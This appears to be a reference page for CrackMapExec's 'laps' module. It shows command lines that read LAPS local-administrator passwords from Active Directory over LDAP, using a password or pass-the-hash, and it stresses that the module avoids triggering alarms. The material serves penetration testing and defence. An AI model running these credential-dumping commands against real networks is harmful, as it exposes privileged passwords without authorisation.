CrackMapExec Laps (ldap)
This page contains detailed information about how to use the laps CME module while using the ldap protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module retrieves LAPS passwords from the Active Directory domain controller(s). It works by retrieving the ms-MCS-AdmPwd attributes from LDAP.
The laps module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.
Supported Protocols
- ldap
Module Source Code
Authors
Module Options
As you can see below, the laps module has one option:
# cme ldap -M laps --options
[*] laps module options:
COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *
Note that this option is not required. If you want to change the default value, you can do so by appending -o COMPUTER=VALUE parameter to the command line.
Module Usage
This is how to use the laps module while using the ldap protocol:
Syntax:
# cme ldap <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M laps
Local admin:
# cme ldap 10.0.5.1 -u Administrator -p P@ss123 -d . -M laps
# cme ldap 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M laps
Domain user:
# cme ldap 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M laps
CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:
# cme ldap 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M laps
# cme ldap 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M laps
The module can be run only on a single host. Running against multiple hosts is not supported.
References
- https://github.com/T3KX/Crackmapexec-LAPS
- https://www.n00py.io/2020/12/dumping-laps-passwords-from-linux/
- https://github.com/n00py/LAPSDumper
Version
This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.